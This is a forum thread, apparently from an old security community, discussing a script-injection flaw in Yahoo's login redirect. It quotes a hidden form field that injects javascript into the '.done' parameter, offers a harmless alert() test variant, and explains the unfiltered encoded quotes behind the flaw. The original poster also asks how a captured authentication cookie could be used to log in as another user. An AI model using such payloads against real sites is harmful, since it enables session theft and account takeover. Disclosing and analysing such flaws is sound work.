Results 1 to 5 of 5

Thread: Yahoo Authentication Vulnerability

  1. #1

    Yahoo Authentication Vulnerability


    While I was browsing, I stubled upon a Yahoo! authentication script injection vulnerability
    By this we can inject our own scripts into just after authentication.
    The below link illustrates an example of a script injection where u get the authentication code cookie for the particular user.

    I request u to try it out...
    U can test it here .

    I've a doubt...

    What do I do with the code shown up as our authentication code...
    What is the use if I get the code ??
    With the help of the code persumably, I can log on to yahoo into the particular without my username or password... How do I do it ??... How can it be related with cookie... I'm totally confused
    Can anyone give a bit detailed explanation ??

    Thank u v'much.

  2. #2
    this looks kinda suspicious to me..........

    after looking at it, it almost seems like a ploy to get peoples yahoo accounts.....

    however if you go to the root directory of the page given it seems legitamet....

  3. #3
    Did they already fix it? I cant get it to work in Firefox or IE. It doesnt seem like they could do much with the cookie/code anyway. I would assume it is encrypted and it is only valid for a certain amount of time or maybe even only valid for a certian IP address?

  4. #4
    Senior Member
    Join Date
    Nov 2001
    Evidently this is working properly. On the page linked above at is the following code:
    <form method="POST" action="">
    <input type=hidden name=".done" value="javascript:location.href=%22;">
    <input type="submit" class="submit" value="Test Exploit"/>
    And it shows up again on the yahoo page (which is legitimately a yahoo page):
    <input type=hidden name=".done" value="javascript:location.href=%22;" >
    It is indeed posted to the yahoo secure login page, which is also again forwarding you on login success.
    The yahoo page posts the data to the following url:
    Code:<some sessid>
    For those untrusting, save a copy of the zapthedingbat page locally, and change the following line:
    <input type=hidden name=".done" value="javascript:location.href=%22;">
    <input type=hidden name=".done" value="javascript:alert(%22Vulnerable%22);">
    This will just pop up an alert box after you log in, however, what it means is that the script has successfully tricked the browser into throwing whatever javascript it wants in there. In theory, this could be quite a large amount of scripting with some subtle changes. The vulnerability appears to stem from two things:
    1. They don't check the referring url is from their domains.
    2. They check for raw <script> tags, and ' and ", however they don't check for the unicode values of those things, and when the location is rewritten to the browser, %22 is literally re-sent (and translated into "). Some simple unicode filtration would pretty well shut this vulnerability down.

    No, it isn't a scam, but they may be using this vulnerability to collect passwords, so I'd encourage anyone playing with this to work from a copy of the script with the modifications I put above.
    Chris Shepherd
    The Nelson-Shepherd cutoff: The point at which you realise someone is an idiot while trying to help them.
    \"Well as far as the spelling, I speak fluently both your native languages. Do you even can try spell mine ?\" -- Failed Insult
    Is your whole family retarded, or did they just catch it from you?

  5. #5
    "people fear what they don't understand" i withdraw my past post in the thread....

    thanks chsh

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts